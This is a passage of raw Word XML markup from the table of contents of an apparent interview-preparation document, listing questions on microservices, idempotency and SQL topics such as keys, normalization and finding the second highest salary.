        <w:p w14:paraId="4CE9ECC8" w14:textId="21D610C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clean code architecture / strategy / principals?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867956 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1042</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="452D84AE" w14:textId="5B9523A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12 factors of microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867957 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1044</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E47E0BF" w14:textId="410AB50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meaning of idempotency?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867958 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1046</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="268601EA" w14:textId="2F02F532"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7959" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867959 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1047</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E0431AA" w14:textId="5A60C54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7867960 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1047</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01F247CA" w14:textId="4F068CC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ifferent Keys in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867961 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1047</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46B8BBC4" w14:textId="30D1C55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Truncate and Delete?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867962 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1050</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38082E90" w14:textId="578450D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Get Zero records from table having n number of records?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867963 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1051</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CEF2B6C" w14:textId="73624EB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 xml:space="preserve">What is ordered by and range in </w:t>
            </w:r>
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>he database?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867964 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1051</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E61914B" w14:textId="2A6BC2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Second Highest Salary of Employee from the Employee table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867965 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1052</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="300FD9E4" w14:textId="6E1D6C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7867966 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1053</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B26CC2E" w14:textId="7B146DE5" w:rsidR="00B502F6" w:rsidRDefault="00B502F6">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7867967" w:history="1">
            <w:r w:rsidRPr="006E6F1F">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7867967 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1053</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A73DE12" w14:textId="0D9B220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Find department name and number of employees in that department?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867968 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1053</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A1B3EF7" w14:textId="72D7A17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7867969 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1053</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="624B6F2E" w14:textId="33E3433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7867970 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1054</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02F535AB" w14:textId="428EE07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7867971 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1055</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1418A190" w14:textId="72C287A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To update data in the table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867972 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1056</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FFACCE3" w14:textId="7A9D4C5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7867973 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1056</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2392D418" w14:textId="623953B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7867974 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1057</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52DF55F7" w14:textId="0433EB6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7867975 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1059</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CF1B5E0" w14:textId="0C47C38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enormalization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867976 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1061</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FDB47B7" w14:textId="6C34BEA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Normalization and Denoramalization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867977 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1063</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A5AFC30" w14:textId="450A535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Creating table with constraint to check employee salary is greater than 5000?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867978 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1063</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F89ACEE" w14:textId="7963465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remove duplicate records from table which does not have primary key?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867979 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1063</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FBC0B18" w14:textId="401C750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ommon Table Expression in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867980 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1064</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C024919" w14:textId="3A5FDF4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7867981 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1065</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EBB1275" w14:textId="6A8F764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7th highest salary of an employee?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867982 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1066</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29BFEC32" w14:textId="00BD402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7867983 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1067</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42D4FDE6" w14:textId="2026E68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7867984 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1068</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="001D4231" w14:textId="48BB087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7867985 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1069</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D80F8E9" w14:textId="2B12DD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7867986 \h </w:instrText>
            </w:r>
